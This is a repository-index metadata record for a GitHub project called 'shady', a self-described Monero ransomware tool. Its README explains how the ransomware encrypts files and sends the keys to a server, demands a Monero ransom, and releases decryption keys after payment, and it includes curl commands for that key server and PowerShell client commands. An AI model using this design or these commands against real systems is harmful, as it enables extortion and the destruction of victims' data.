{"id":31650847,"url":"https://github.com/sausagenoods/shady","last_synced_at":"2025-10-07T08:39:30.270Z","repository":{"id":111902964,"uuid":"554432068","full_name":"sausagenoods/shady","owner":"sausagenoods","description":"Simple Monero ransomware implementation.","archived":false,"fork":false,"pushed_at":"2025-09-04T19:49:05.000Z","size":21,"stargazers_count":7,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-09-04T21:31:35.164Z","etag":null,"topics":["crytocurrency","file-encryption","malware","monero","ransomware","xmr"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"wtfpl","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/sausagenoods.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"COPYING","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2022-10-19T20:02:40.000Z","updated_at":"2025-09-04T19:49:17.000Z","dependencies_parsed_at":null,"dependency_job_id":"b499f4d9-0213-4fca-959d-6cae7f8bdcfa","html_url":"https://github.com/sausagenoods/shady","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/sausagenoods/shady","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sausagenoods%2Fshady","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sausagenoods%2Fshady/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sausagenoods%2Fshady/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sausagenoods%2Fshady/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/sausagenoods","download_url":"https://codeload.github.com/sausagenoods/shady/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/sausagenoods%2Fshady/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":278745257,"owners_count":26038433,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-07T02:00:06.786Z","response_time":59,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["crytocurrency","file-encryption","malware","monero","ransomware","xmr"],"created_at":"2025-10-07T08:39:25.962Z","updated_at":"2025-10-07T08:39:30.263Z","avatar_url":"https://github.com/sausagenoods.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Shady\n\nVery basic ransomware implementation that encrypts files, sends encryption keys to the API server, requests Monero from the user. Uses [MoneroPay](https://gitlab.com/moneropay/moneropay) to track payments sent by the victim. Provides an endpoint for the user to download keys to decrypt their files if the payment has arrived.\n\n\u003eNow there's a MoneroPay powered ransomware that isn't the original Moneropay ransomware which wasn't powered by MoneroPay.\\\n-- crtoff\n\nDo you need a pentest? Do you want to make sure your security tooling can effectively mitigate threats? Engage us here:\n\n[![Digilol penetration testing services](https://kernal.eu/posts/xmpp-enumeration/digilol-pentest-banner.png)](https://www.digilol.net)\n\n## Server\n### POST /encrypt\n```sh\ncurl -X POST http://baseurl:1337/encrypt -d \"key=keystring\"\n```\n\n#### Response\n```\n740f1fb1-c47d-4059-8104-accdc718a1b4 8BGoVn4r5mPL9qYjFmaNGyLKmVvHzQj6Z51YpPL67br9fynLsjaEG7PJaTpmjbUi7bWikXmaBTo7pWdbLo1CQMqiUFrBzPV 0.1\n```\n\nThe format is as follows: [Payment ID] [Monero address] [Monero amount in float]\n\n### GET /decrypt/{id}\n```sh\ncurl -X GET http://baseurl:1337/decrypt/{payment_id}\n```\n\n#### Response\nIf the ransom was paid the response body will contain the key that will be used to decrypt the files.\n\n### POST /callback/{id}\nThis endpoint is given to MoneroPay to callback.\n\n## Client\nImport as cmdlet:\n```\nImport-Module shady-client.ps1\n```\n\nEncrypt all files with .txt extension in the current working directory:\n\n```\nShady-Client -Encrypt\n```\n\nDecrypt files once the ransom has been paid:\n```\nShady-Client -Decrypt\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsausagenoods%2Fshady","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsausagenoods%2Fshady","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsausagenoods%2Fshady/lists"}